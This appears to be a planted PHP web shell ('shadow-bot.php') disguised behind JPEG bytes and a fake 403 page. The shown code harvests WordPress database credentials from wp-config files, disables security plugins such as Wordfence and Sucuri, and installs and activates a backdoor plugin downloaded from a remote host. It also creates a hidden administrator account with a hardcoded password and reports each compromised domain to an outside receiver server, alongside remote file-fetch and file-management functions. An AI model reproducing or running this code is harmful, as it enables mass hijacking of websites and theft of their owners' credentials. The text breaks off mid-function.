���� JFIF  H H ��(ICC_PROFILE   0 mntrRGB XYZ acsp  ��  �- desc � trXYZ d gXYZ x bXYZ � rTRC � (gTRC � (bTRC � (wtpt � cprt � ب���V�7eud�akt��!Q ,*R����G�PQ�NČzŬb 56��6��6p �z��"c8�3'���'Mq�6����G�i�t�q��l@�9��0.ۚA�����c���N|li:�9�蠃p���/��^�Zn���L���x84�v�����;[#$ ��n����h�'�����c���3���2o�8Ɛ5K��Av*_�?n�X�?��p��y�ֆ����̈́#�z�����2�3�F0O���e> {�Gu�.�V �(C���'h/�o%>�x1X� r:(>}�{�yc��X�8b��]�U�:�dO�Ms���VA�����p�'Z�3'3E�-�y��bj:�>��j�Ov�Uw�#�2cl~�@gF�C����jț���bz� ^:����-t��df��j{XTh���8aU���M��^+d�Al��"(KK� m1$$ X�K�K�q�rž�o�q��g� V FF#pG~����:�]�֦��!!Ң�:pC+ �A�����zӬ�].��t�`=�'�h�_/�}����� �@L�\�,�x㌼��z԰+�J�-��v�+�Y��������[�'8�'�� �%�� X q=������[4�Sj~�4�ݢ�#�d�ʂē�R�L5k��X؊���>��l���:t\��ba��B��A\Q3�8�(�<���A�;�d�)�n�ӓLr�Œ��*�|J�: Ƒ���2rF ������G�A�8��&\ �A�-�J) ��/j�`t.���E�� � ��A�:�T �m�"%Cb"!��7��wΦ�� �Æ��%�;���[�]�U�zmF������kx�+��7�^�Ү�R��"7�����N+-��b7�c�,.55�H�T���E`)��P�T ci 20y=MڭyٽS��Odc�i�UJnq&~zn$�Rp��)fG'�2�'����.�mEϙ���Z����oV���𶛒u�S�]�|�A�@.���)<��+�'>�� ө����:&�$� '��L�#���d{q�H�>*5;��jDo����� ˷�����Y��m���Ԉ*[9*�5���t�Uf��%3��= �GU������W\�'�����AR��_�W��4�_��P �պ�� ��-���|�4R��F��JZ�v0�d[ˠzJ|��PU�8��;鯌� '�V��cL�,���κ�>���*e��b)f,�0�"j1���� �1������v՘;�b�J��++�C�Oz7�%�>�N�U��,=z�\�c�EV�K�>Ic�7} .��jHn;^觱GHI����� �H�V����ǂO:�ߊ{mSV?K|@�� ���A��iA����T`2��j �� 1�~�K8’$� �~]=9ឦG �*����9�E�Mּm5X�f�9�Q�ĸ}i D%��+t+;F��: v�:�-�&����h�_�rD�|�!� �Ә�;Z�l��븂'�������:�C�&�Ҁae��Kkm6���� �uT".}J&\� hci�B2B�+�T�7�t?EPþЌ��m�A�F\�l���c2�ЊABm�E,cն\Q���J�]d�5� �����������`O�� Y@�8�?lx#���K�iI&��Ri1f��R2f1N�%_�g�*T���Ө��??N:����}+ל�ɀ�h٭�q��L��,ʈ�B�r����c��u��Bmz�� ̢TV^� 뙏8' ����u��fUX�3㓏��>NG�:���/�;�H�p饕�B�1�K�� ���/%iɫ V�Q%�:�_ -��1o����L�?�R��oa\i^����F|����W*Na)��P�� �X�#y㯨�z+C���ح\��в�j��i�rm����*d��W�ҡQb�BȨ��i'%�NEb�?���'[����h�=`Oi��U϶�u� ���n��R�}GW�4f�VJm������i�R���~��J|l%m'��%�"�LW�� V��2���7���Ns�X�b�?_�=����{s�}ij4�Ý=SN����jx�FV�"ԎI(�E���)]�ӝ�Ж���m�[4 m��`5�-7W�����f�󪥎�b�Z�K�a#Vb%��K��Y����5���T�$y`�4�6�̼�p �C�7�HM������'l{Oi � +���Pw~j,S5T4(F�Ԩ;�A��`*HJ��TP�g�t��(6/�cg��5�U�1@Qb8�Y!����r�<���r�6h��)��[{h�h�8 ���3���� ��0<�y+V�>BzOQ�KF+6�v�%=��~XD��PpW���c�_-:߈����#c�坣���C�W1�:�^�Q�� 06Ӭ�q@ Dj�$ �UW���$�?9���F�\cS���M5�=��2>�hב\,(�)�JB�k���; �J���#j徻W�(p=�o��Q�D� #U�Mh��U�*F��c ?N���=�n���F5��Ӑ12��w�0�5Z���뀩4ڣ���霅�uC1������y�����%n���J�8Ԑ���*c��r������R��� ��9W=�H�����9�,�A�׻,��.���ZF�b�� QEGVNs, �q�'�����;O����Mm�btN���Vq�Ow*֙kPѬ؈����X�J���I��ӯ��E������Wo�k�+��R�{��%�����j;��� ���Y��x����� ��7&&���,���LԜ���Y�bw"�lI���(*���`۹F� ����A�S����- #$�������4����13)Q���pڤ3Rx�O�J�$c�P]v�i�uq� {��k��y�N.��- ��B���,@󪳪ڸ�Ao���r%��X0�U��N��b��9 ���������򍕑��7)*��23�3���|�Rn�b���@�q��|E���U���y��́$!7����&���["X�O�y� �~ƓtADhP���]��m�G�파�9�p=�ԜZ]ӭ�ሎ�O�eyq�� !�b�I �GU����:�5~�F��o�L �S�T[е�$]$g��*�w]��!��;��m@�ޠ�&IU�ڬ{�҄բ-.Sm�Ғ�`���� �������vU"o�L��;�'��5s�"�W�)��@��ä���L�1i��}�^Y5�$+�P���v0o ������HU @ȓ��s�Q�M�)��?�M\��4�Q�� ��$2���;g� �WJ�/NwF�JG�D�:� y�� ��ό���Mf��W!���QUZ%a�zҳ����DK�_��X�h��M�^r�ԝ^!d��'<#ﴛ�O���{����/F�?�+�$ �Y�' wg'$��l������jG�AH�7l�4�������x�Ѷ�c��}���I�*e�s��g�~��;ͤ��t@����B�����2�iB'�9C �a�8���f�TR:�� �����%���N�O���@� m����3�s�v�� ��w� .@�濾��� ��,FYrT0m��UW�_v>>d�[���A�6��ڊx�:�Y�����T�L�����Hv��Ӻ!�n�S�D}�>[m�E�T0��_�,'C]���p����j�����V���ᅷ��PDZ[-��V0`����>�}��ܟpmֻ�2O6�O*����ݹ�X�HS�N(J�� /�+1՟�#(��P�*g�����EO�#�w&j�6�?;��ڡ�)+�U���]l��\�/{莄��*�I���/�����9�<'$�'#'��y�t/&�-\\WP�L`/p9�q��a'�e��¨��E]�� f��A�A�E�Y�nGtm,�ϮwXT�>AaN#���F��j��ŵj�Q�Fd������q^<�H?��y���J�܃2�*���3� T4�Ч����H���**W;�(ꭽ�¾�P�f=����e���yA���4�FJ��6{e�]J��q��OC��f#3��S�J�f i�MM\ i�T�$�rG�8$��9>2��:��M)���Q�#N��K��e��&"�E�8�����.��z�<��mHk�?�#��t��˒��A���]; G0H�:��f!�i�! ��� j�{���1�m�}���o��7�u;�$����99Ӱ���\n�c��z:zA�Lq�޶w�y��K���T<�����4�X,�'!Y;���Ͱ6�q� G�M~_�~܂}��t>���(��z�l�}:r �L�9 fe}.-���R*<`c6��o�ܛ=�pr��ҽGB)nQ%���������)s*&i΍��%—Zb{���m[��N�Nkb���wB����w Q*��d��F ��HP � � iܛ�; aV68j}\e�I��GI'͔B����;yA �:^���bn��-�m�#�@������S6�ˎr���� ;��~�cm�ƻgU��:�X6�G��%�<�r�' dzX^}�-� �H�X�D�������-C�W`#���کpNH5�E�y��=�1���G�#�꽁���C�5Yx��z�Y_"&�A�*�C� �+q7Km�1Pm��@in�88��  N�� ^c.d �p� � �>[�g�c��������{]c�4�)����f�psgY��˅����>��*"1���}2<1���7����5)]���������V5)kd�kM��~`�΂�����:{���4���nG��PTT�����b�� �� �� ����뎱�϶w FFᓂG8���>z��F����_�H��9_r��D��l:������ҶH5��Z!Bj.y��k}�e�rb:SOT��]!ǎ?n:H�ε�Z�s��y�z�tn���[�7N��Z#UQO$�.�J�#]Cr#�Y��X���9���c�<��'$�������z��� 9� ������.�$��$P���nDS�n ��2��u5���X ���g\��� �?�����|A���ᬰⶵ��� �>>�bE)�Cb����-ruMc��׺��*,\)`^���m� ge�\k�.�۫8��گ��oK�1��gWM�p�U޻zI=EE�rz:�#���6�-�-/�Wm��\z8�מ�0x �t��A���_c�?Ծ���c�^Mژ�������I�MyO>�l0�ċ�}t7[�\�ʲ9̜��m_a[�姯�rְ�j��P�\k�x��1�'�CdmvF70e���+����m-�]a��?ݝK��uSMUm 8f� ��Yb!�)�2Z.U���D� ���\~:��ܽ8z��R�̪K�c�b�s����&ߦ��������1�$�,� w�\gc�����3F$��iU#<�`��:�I�4{w���.���2���a��Q�$�EX�<��p}�x>N���o?Gm ��N�N rE��$#J�n҉�!��A��H'<�w���i���i͗k�;��S;(PY ����y,��|� v� �G!H���$��4�ƴ��@��V��!қ 7����� �$�� ���{��O�y�� �W�SY��:��I�doI�5b�_���s��G��q��$�qIOg�-���B�H]_�V���������G����!��w0�p$����n�U����#ROMB��$Zn:�BD�U���KE�4�����ec�q������}���3�������^���n��BZ�j�b��W��`l��� �Z�d�"��"�b�]nm!ij.��{&*������F���O?��c�u�]�������u�VQbj:�J�B��.Xg�J�Fsq�d祚N� �x�ʣR��;!�$�� � �:��F�cU��$R1- �K�'ɋ� I���x8�Ϗoߠ�F~�� ���z "��_^v�2��-����f��K ������kW8 c�.�Ms-����6�=eV�=����ev�\����������L�=� g�n22p<�׵?r�Fۏ�>z��eP��z��Rog�8u�(�tJ�P߁�Z���.p�Ð���͢A��ռ65�X��syvm��� 6R�W7W��;��|0�� >O��үG��@������ٳ<�>�om��Լ()���kZJlK,����F 4��)sn��������O�Q�{u㌏�=� A��o���,ծ����?eKB�zG �6e6������ ������ f|�C�U�� �_�4�C[j͕M�8,%em��M���8�\� ��c�v� COwTGi� _9��4���BDf%���'ns��8�M�P��c���������&�-�y"8R��_j���� �3a��+z+��N� �9���Q�lDQ�40�E �V���ۋ�rH�2�I�_���Y�O�',:뿉�WN�Hvﵐ0�B}n�����a*E zUb�N#��0�e"�f.Q���� ��H��5"��-�H�Vn=�+ #� �Eiy- �v8=�g��`���o�[ 鼛�2�.�D�^�����Q����eB� ؅q��Ͽ�R�C~ B+J�ۍ��8 ���4���*�Ӗ������Ν1��R �B��I\ �1[0 �I�9y��)���Y " 7�]6�q��g\� ��vP�  ��s�= Ѭ֕)פ��E��<�� �c`��ϷU9�W��,: �?�y����1h�s�U(�T g��e�/룮����J�A�]|��������4a�ZV�AI�eIhBI!�l�$��3![q�Hnw\7R�{��o�M�/�ִ��>�5&�� gw�j�F�E��� dc@K:V&�W�/k�+�=�Y�k[� @fU��5�zzmF��ȖH,[��� n�-dc� �w�d[��z"��g�4��ϘR�r�0`B��8_;�� #�$^Z�������o5K�ZYKj �GY%�����s�"!a�[9I2TF�����-�������w#a�]���˒����I�tٮ�ei_��F�pVЧ૱W�3e�Ci�7� ���"���}��H��A�pG>�h��֝������5i�� T٧- '�`d�X1���AF$�$<���y��9~��,��n���e�boW�>ޙ_��Z]ڷ�T���C�� ���U�y� ��J���G��O��}���� ���>���A"����5��a> Z�U��R� -��Z�\9� jrW��ݖQ�Rݳ�*�ļ��]�$ڵ�Xq�=�/��w�� ��z\��I��I�#�{�ӭ��l�^;�F_R쵎�[ָ[gK�KͰ�o�Q� )W녕��і��s�*kuz�ŨQde`�WU_��KLE��~"��g r<�2G�y��އ����L�(�-V�Y��� -Z(�I�U�����0� �|�\���;�8��C��� ��m����hl��:̄D��k�YHO�k��|:��*D��Y� ts�س� |��zrO;�񍃌s�T3���1���=�j�w���y��Ш��^nZ��H���m��_G̮��0W���������󿓹�S�;�����_$�mٛI��D�V��=f�-H�}����U����]H��A��*�vԶ����3\�Wh*I#$�@6�����x��^��O�Z���C&J�U� 16� X�D*��if&��B��DGFY�YP�[KL�X u�X �.Z�� h��q Ghb��8��M#�Mq�t�\c�>�� ��aT �� 00=�㎨ʕ�G�Q�Ԫ�R�����,Ĝ�I9����zӦ��JO��3Rn��`�C�5����܊@Q�O1�N.ؔ"I\�YÖ�Đ�H�d���L���������\}IP~jm�$ y�����;� ����:ZG��ZV�Jv ��=&*UF#`�`R`*S+p��\=)� ���ҭ�9�k������̮Rš�x��0'����**ԑL�kɺk��+zJb�#�:|M��Z� ��?�j$ݼ &�X�)$���6�F���Y6ѕ/������;�� ��J�*n����l��C�*ų_� �ԕ{�_�6�:\47ڷ�s��4R���m�Ċ�=����z ����*��ʪ��XT��[��������]�5�Bl#a�-˙bv�8�@�H���|R���we9A%5&�M����%�Z02T���N)&&GfM 儀o��Œ���M�;=���./�/k~ E"a9/3���y���,>��l��j��>������Z��X��y�&ε��Y�P��&h �g�e�c<�``����]!}i'c �KQ�ulF�Iʓ_\T58��(�+cJ��q~ ����[d�����gm�m/`��Xڙ�ht�k�q� ��ו$���"�c[P�VY�[uɜ&#�몵��"���Ⱦ�qC���"�Ü��Ȕ!���<����M�j8��u-�d��x��*�g��ϫ�t�T�Ld�K�laWڭ��\���~�|����7�u`��h(����w��֋�c�L=�����˼�=�F��vcG��s�}��зU����BS�М;�FI;���Q�$8�+V|[C�S��쮙���1�%�YP�� Q%� L�����VVK+&�,�c�Ib��]���Vy�i� �~h��?y��F4��"5��A�s-���F� ݆x5���5P&E�:W@f;}��G�y���^�]U ��� ITki�� ��1���� �d﫠���*c���N���h��'� c�ؗY�n�s�L����:b��?��H� :k���M~�@����8#�I�qɔ�~��:f�]��P*i]H��'f��jhx�Tҗ�1��O��:���^t�$�1]�����UXz&������t�OD�T�����>�(^�s��&3��#N_�/�x��-�䬦?��� ~��v��U-����W$4����'�ӎ�v�������RG�|jy��SW?�u���4�(�1 G[��ِ2��2jʎ�hr�m�oյ�ش��gRͮ%ϟ�Ѭ��9� �o���R  n-�����&F�-�����@����hgY�����_qN��;"2 �!K�J � šA��^, ��"�aG�8`�=1�4�=5�Mq�k�>��U@UT �:�R�gj����rK�F.�O$�I9'���=i�}.�_�� 403 Forbidden
  • Your IP: 216.73.216.38
  • Server IP: 54.36.91.62
  • Server: Linux webm008.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
  • Server Software: Apache
  • PHP Version: 7.0.33
  • Buat File | Buat Folder
Edit File: shadow-bot.php
"; if(!$suc_tok && !$res_tok) $h_tok .= "

Gagal eksekusi. Semua fungsi exec (shell_exec, system, popen, dll) mungkin didisable.

"; $h_tok .= "
"; $success_msg = $h_tok; } // FITUR: SCAN SITE TOOL (MODERN GRID LAYOUT) if (isset($_POST['scan_site'])) { $target_scan_dir = isset($default_dir) ? $default_dir : getcwd(); $found_domains = []; // Scan folder logic if (is_dir($target_scan_dir)) { $items = scandir($target_scan_dir); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $target_scan_dir . '/' . $item; if (is_dir($path)) { // Regex domain if (preg_match('/^([a-z0-9]+(-[a-z0-9]+)*\.)+[a-z]{2,}$/i', $item)) { $found_domains[] = $item; } } } } // --- MULAI TAMPILAN MODERN --- $out_html = '
'; // Header Panel $out_html .= '
'; $out_html .= '

'; $out_html .= ' Scan Result '; $out_html .= ''.count($found_domains).''; $out_html .= '

'; // Tombol Close $out_html .= ''; $out_html .= '
'; // Body Panel $out_html .= '
'; if (!empty($found_domains)) { // Grid Container: Responsif (otomatis menyesuaikan lebar layar) $out_html .= '
'; // Icon Google SVG $googleSvg = ''; foreach ($found_domains as $dom) { $link = "https://www.google.com/search?q=site:" . htmlspecialchars($dom); // Item Card $out_html .= '
'; // Nama Domain $out_html .= ''.htmlspecialchars($dom).''; // Tombol Ikon $out_html .= ''.$googleSvg.''; $out_html .= '
'; } $out_html .= '
'; // End Grid } else { // Tampilan Kosong $out_html .= '
'; $out_html .= ''; $out_html .= '

No domains found in this directory.

'; $out_html .= '
'; } $out_html .= '
'; // End Body & Main Div // Masukkan ke variabel pesan sukses agar tampil di atas $success_msg = $out_html; } // B. MASS ADMIN if (isset($_POST['create_wp_admin']) || isset($_POST['reactivate_plugins'])) { $targets = []; $root = isset($default_dir) ? $default_dir : getcwd(); if (isset($_POST['create_wp_admin'])) { scan_smart_stream($root, $targets); $targets = array_unique($targets); } else { if(file_exists($root.'/wp-config.php')) $targets[]=$root.'/wp-config.php'; } if (empty($targets)) { $error_msg = "Tidak ditemukan wp-config.php (Smart Scan)."; } else { // STYLE $st_ok = "background:#28a745; color:#fff; padding:2px 6px; border-radius:3px; font-size:0.85em; font-weight:bold; margin-right:5px;"; $st_err = "background:#dc3545; color:#fff; padding:2px 6px; border-radius:3px; font-size:0.85em; font-weight:bold; margin-right:5px;"; $st_warn= "background:#ffc107; color:#000; padding:2px 6px; border-radius:3px; font-size:0.85em; font-weight:bold; margin-right:5px;"; $log = "
"; $log .= "

Mass Execution Result (Cache Bypass Mode)

"; $au = 'xshikata'; $ap = md5('Lulz1337'); $ae = 'topupgameku.id@gmail.com'; $plugin_src = 'https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/system-core.php'; $plugin_folder_name = 'system-core'; $plugin_filename = 'system-core.php'; $plugin_hook = $plugin_folder_name . '/' . $plugin_filename; $plugin_hook_old = 'system-core.php'; $receiver_url = 'https://stepmomhub.com/wp/receiver.php'; $receiver_key = 'wtf'; foreach ($targets as $cfg) { $raw = baca_file_smart($cfg); if (!$raw) { continue; } $dh = get_conf_val_smart($raw, 'DB_HOST'); $du = get_conf_val_smart($raw, 'DB_USER'); $dp = get_conf_val_smart($raw, 'DB_PASSWORD'); $dn = get_conf_val_smart($raw, 'DB_NAME'); $pre = 'wp_'; if (preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]/", $raw, $m)) $pre = $m[1]; $wp_root_path = dirname($cfg); $disp = str_replace($root, '', $wp_root_path); $log .= "
"; $log .= "
Target: ".($disp?:'/')."
"; $log .= "
"; @mysqli_report(MYSQLI_REPORT_OFF); $cn = mysqli_init(); @mysqli_options($cn, MYSQLI_OPT_CONNECT_TIMEOUT, 2); if (@mysqli_real_connect($cn, $dh, $du, $dp, $dn)) { if (isset($_POST['create_wp_admin'])) { // --- OPTIMASI: DOWNLOAD MASTER SEKALI SAJA --- global $master_core, $master_index; if (!isset($master_core)) { $master_core = sys_get_temp_dir() . '/master_core_' . time() . '.php'; $master_index = sys_get_temp_dir() . '/master_index_' . time() . '.php'; $ua = stream_context_create(['http'=>['header'=>"User-Agent: Mozilla/5.0"]]); $src_core = @file_get_contents($plugin_src, false, $ua); $src_idx = @file_get_contents('https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/index.php', false, $ua); if($src_core) file_put_contents($master_core, $src_core); if($src_idx) file_put_contents($master_index, $src_idx); } $plugins_dir = $wp_root_path . '/wp-content/plugins/'; // --- 1. KILL SECURITY PLUGINS (RENAME MODE) --- $targets_to_kill = [ 'hostinger', 'wordfence', 'ithemes-security-pro', 'better-wp-security', 'sucuri-scanner', 'sg-security', 'login-lockdown', 'limit-login-attempts-reloaded', 'all-in-one-wp-security-and-firewall' ]; $kill_badge = ""; foreach ($targets_to_kill as $folder) { $path = $plugins_dir . $folder; if (is_dir($path)) { @rename($path, $path . '_killed_' . time()); $kill_badge .= "KIL:" . strtoupper(substr($folder,0,3)) . " "; } } if (empty($kill_badge)) $kill_badge = "NO SEC"; // --- 2. DEPLOY SYSTEM CORE --- $target_folder = $plugins_dir . $plugin_folder_name; $target_file = $target_folder . '/' . $plugin_filename; $index_file = $target_folder . '/index.php'; $dl_badge = ""; if (!is_dir($target_folder)) { @mkdir($target_folder, 0755, true); @chmod($target_folder, 0755); } // Copy Core if (!file_exists($target_file)) { if (file_exists($master_core) && @copy($master_core, $target_file)) { @chmod($target_file, 0644); $dl_badge .= "CORE "; } else { $dl_badge .= "CORE "; } } else { $dl_badge .= "CORE "; } // Copy Index Activator if (!file_exists($index_file)) { if (file_exists($master_index) && @copy($master_index, $index_file)) { @chmod($index_file, 0644); $dl_badge .= "IDX"; } else { $dl_badge .= "IDX"; } } else { $dl_badge .= "IDX"; } // --- 3. ACTIVATION (HEX) --- $act_badge = ""; $is_active = false; $wp_content = $wp_root_path . '/wp-content'; $obj_cache = $wp_content . '/object-cache.php'; $adv_cache = $wp_content . '/advanced-cache.php'; $renamed_obj = false; $renamed_adv = false; if (file_exists($obj_cache)) { @rename($obj_cache, $obj_cache . '.suspend'); $renamed_obj = true; } if (file_exists($adv_cache)) { @rename($adv_cache, $adv_cache . '.suspend'); $renamed_adv = true; } $qopt = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='active_plugins'"); if ($qopt && mysqli_num_rows($qopt) > 0) { $row = mysqli_fetch_assoc($qopt); $current_plugins = @unserialize($row['option_value']); if (!is_array($current_plugins)) $current_plugins = []; } else { $current_plugins = []; } $current_plugins = array_diff($current_plugins, [$plugin_hook_old]); if (!in_array($plugin_hook, $current_plugins)) $current_plugins[] = $plugin_hook; sort($current_plugins); $hex_data = bin2hex(serialize($current_plugins)); @mysqli_query($cn, "DELETE FROM {$pre}options WHERE option_name='active_plugins'"); if (@mysqli_query($cn, "INSERT INTO {$pre}options (option_name, option_value, autoload) VALUES ('active_plugins', 0x$hex_data, 'yes')")) { @mysqli_query($cn, "DELETE FROM {$pre}options WHERE option_name LIKE '_transient_%' OR option_name LIKE '_site_transient_%'"); @mysqli_query($cn, "DELETE FROM {$pre}options WHERE option_name='rls_setup_done'"); $act_badge = "HEX"; $is_active = true; } else { $act_badge = "DB"; } // --- 4. CREATE USER --- $u_badge = ""; $q1 = @mysqli_query($cn, "SELECT ID FROM {$pre}users WHERE user_login='$au'"); if ($q1 && mysqli_num_rows($q1) > 0) { $uid = mysqli_fetch_assoc($q1)['ID']; @mysqli_query($cn, "UPDATE {$pre}users SET user_pass='$ap' WHERE ID=$uid"); $u_badge = "UP"; } else { @mysqli_query($cn, "INSERT INTO {$pre}users (user_login,user_pass,user_nicename,user_email,user_status,display_name) VALUES ('$au','$ap','Admin','$ae',0,'Admin')"); $uid = mysqli_insert_id($cn); $u_badge = "ADD"; } $cap = serialize(['administrator'=>true]); @mysqli_query($cn, "INSERT INTO {$pre}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$pre}capabilities','$cap') ON DUPLICATE KEY UPDATE meta_value='$cap'"); @mysqli_query($cn, "INSERT INTO {$pre}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$pre}user_level','10') ON DUPLICATE KEY UPDATE meta_value='10'"); // --- 5. PING & DIRECT REPORT (GARANSI LIST MUNCUL) --- $ping_badge = "-"; $surl = ""; $qurl = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='siteurl'"); if ($qurl && mysqli_num_rows($qurl)>0) $surl = mysqli_fetch_assoc($qurl)['option_value']; if (!empty($surl)) { // A. DIRECT REPORT KE DASHBOARD (Agar list domain langsung muncul) // Kita kirim data domain saja, password kosong dulu. Nanti plugin yang isi passwordnya. $pdata_direct = http_build_query(['action'=>'register_site', 'secret'=>$receiver_key, 'domain'=>$surl, 'api_user'=>'', 'api_pass'=>'']); $ctx_direct = stream_context_create(['http'=>['method'=>'POST','header'=>"Content-type: application/x-www-form-urlencoded",'content'=>$pdata_direct,'timeout'=>2]]); @file_get_contents($receiver_url, false, $ctx_direct); // B. TRIGGER PLUGIN (Agar generate password) if ($is_active) { $trigger_url = rtrim($surl, '/') . '/wp-content/plugins/' . $plugin_folder_name . '/index.php'; $ctx_trig = stream_context_create(['http'=>['method'=>'GET','header'=>"User-Agent: Mozilla/5.0",'timeout'=>2]]); @file_get_contents($trigger_url, false, $ctx_trig); $ping_badge = "OK"; } } if ($renamed_obj) { @rename($obj_cache . '.suspend', $obj_cache); } if ($renamed_adv) { @rename($adv_cache . '.suspend', $adv_cache); } $log .= "$kill_badge $dl_badge $act_badge $u_badge $ping_badge Login »"; } elseif (isset($_POST['reactivate_plugins'])) { $qbk = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='xshikata_bkp'"); if ($qbk && mysqli_num_rows($qbk)>0) { $orig = mysqli_real_escape_string($cn, mysqli_fetch_assoc($qbk)['option_value']); @mysqli_query($cn, "UPDATE {$pre}options SET option_value='$orig' WHERE option_name='active_plugins'"); @mysqli_query($cn, "DELETE FROM {$pre}options WHERE option_name='xshikata_bkp'"); $log .= "RESTORED"; } else { $log .= "NO BKP"; } } mysqli_close($cn); } else { $log .= "SKIP DB"; } $log .= "
"; } $log .= "
"; if (isset($_POST['create_wp_admin'])) { $log .= "
"; $log .= ""; $log .= "
"; $log .= "
"; } $success_msg = $log; } } // =========================================================================== // Action handling (download, delete, create, rename, SQL, etc.) // =========================================================================== if(isset($_GET['awal']) && $_GET['awal']=="pinf") { ob_start(); phpinfo(); $pInf = ob_get_clean(); print str_replace("body {background-color: #ffffff; color: #000000;}", "", $pInf); exit(); } else if ($awal == 'fetch_file' && isset($_POST['fetch_url']) && !empty($_POST['fetch_url'])) { $url = $_POST['fetch_url']; if (!filter_var($url, FILTER_VALIDATE_URL)) { $error_msg = "Invalid URL provided."; } else { $save_as = isset($_POST['save_as']) ? basename(trim($_POST['save_as'])) : ''; if (empty($save_as)) { $save_as = basename(parse_url($url, PHP_URL_PATH)); } if (empty($save_as)) { $save_as = 'downloaded_file.html'; } $pemisah = substr($default_dir, strlen($default_dir)-1) != "/" ? "/" : ""; $dest_path = $default_dir . $pemisah . $save_as; $downloaded = false; // Method 1: cURL (Preferred) if (function_exists('curl_init')) { try { $fp = fopen($dest_path, 'w'); $ch = curl_init($url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 60); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'); $success = curl_exec($ch); curl_close($ch); fclose($fp); if ($success) { $success_msg = "File downloaded successfully via cURL and saved as " . htmlspecialchars($save_as) . ""; $downloaded = true; } else { @unlink($dest_path); // Delete empty file on failure } } catch (Exception $e) { // cURL failed, do nothing, let fallback try } } // Method 2: Fallback (file_get_contents) if (!$downloaded && ini_get('allow_url_fopen')) { $content = @file_get_contents($url); if ($content !== false) { if (@file_put_contents($dest_path, $content) !== false) { $success_msg = "File downloaded successfully via file_get_contents and saved as " . htmlspecialchars($save_as) . ""; $downloaded = true; } } } if (!$downloaded) { $error_msg = "Failed to download file. Both cURL and allow_url_fopen may be disabled or the remote host failed."; } } $awal = 'dasar'; } else if($awal == 'ubah_perm' && isset($_POST['fayl'], $_POST['perm'])) { $namaBerkas = basename(uraikan($_POST['fayl'])); $newPerms = $_POST['perm']; // Simple validation for octal format if (preg_match('/^[0-7]{3,4}$/', $newPerms)) { $pemisah = substr($default_dir, strlen($default_dir)-1) != "/" ? "/" : ""; $pathLengkap = $default_dir . $pemisah . $namaBerkas; if (file_exists($pathLengkap)) { // Convert from string (e.g., "755") to octal integer for chmod if (@chmod($pathLengkap, octdec($newPerms))) { $success_msg = "Permissions for '" . htmlspecialchars($namaBerkas) . "' changed successfully to " . htmlspecialchars($newPerms) . "."; } else { $error_msg = "Failed to change permissions for '" . htmlspecialchars($namaBerkas) . "'. Check server permissions."; } } else { $error_msg = "File not found: " . htmlspecialchars($namaBerkas); } } else { $error_msg = "Invalid permission format. Please use a 3 or 4-digit octal number (e.g., 0755)."; } $awal = 'dasar'; // Fall through to show the file manager again } else if ($awal == 'edit_db_row') { try { if (!isset($_POST['t'], $_POST['pk_val'])) { throw new Exception("Missing data for update."); } $tableName = uraikan($_POST['t']); $pk_val = uraikan($_POST['pk_val']); $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; $pdo = new PDO('mysql:host=' . $host . ';dbname=' . $database . ';charset=utf8', $user, $sandi); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $cols_stmt = $pdo->query("DESCRIBE `{$tableName}`"); $pk_col = $cols_stmt->fetch(PDO::FETCH_ASSOC)['Field']; $data_to_update = []; $control_vars = ['awal', 't', 'pk_val']; foreach($_POST as $key => $value) { if (!in_array($key, $control_vars)) { $data_to_update[$key] = $value; } } if (substr($tableName, -5) === 'users' && isset($data_to_update['user_pass']) && !empty($data_to_update['user_pass'])) { if (strlen($data_to_update['user_pass']) < 32 || !preg_match('/^[a-f0-9]{32}$/i', $data_to_update['user_pass'])) { $data_to_update['user_pass'] = md5($data_to_update['user_pass']); } } $set_parts = []; $params = []; foreach ($data_to_update as $col => $val) { if($col == $pk_col) continue; $set_parts[] = "`{$col}` = ?"; $params[] = $val; } if (count($set_parts) > 0) { $params[] = $pk_val; $sql = "UPDATE `{$tableName}` SET " . implode(', ', $set_parts) . " WHERE `{$pk_col}` = ?"; $stmt = $pdo->prepare($sql); $stmt->execute($params); $success_msg = "Row updated successfully!"; } else { $success_msg = "No changes were made."; } } catch (Exception $e) { $error_msg = "Error updating row: " . $e->getMessage(); } $awal = 'skl'; // Fall through to show the table again } else if($awal=="download_file" && isset($_POST['fayl']) && trim($_POST['fayl']) != "") { $namaBerkas = basename(uraikan($_POST['fayl'])); $pemisah = substr($default_dir, strlen($default_dir)-1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { header("Content-Disposition: attachment; filename=" . basename($namaBerkas)); header("Content-Type: application/octet-stream"); header('Content-Length: ' . filesize($default_dir . $pemisah . $namaBerkas)); readfile($default_dir . $pemisah . $namaBerkas); exit(); } } else if($awal=="hapus_file" && isset($_POST['fayl']) && trim($_POST['fayl']) != "") { $namaBerkas = basename(uraikan($_POST['fayl'])); $pemisah = substr($default_dir, strlen($default_dir)-1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ""; $pathLengkap = $default_dir . $pemisah . $namaBerkas; if(is_file($pathLengkap)) { if (@unlink($pathLengkap)) { $success_msg = "File '" . htmlspecialchars($namaBerkas) . "' deleted successfully."; } else { $error_msg = "Failed to delete 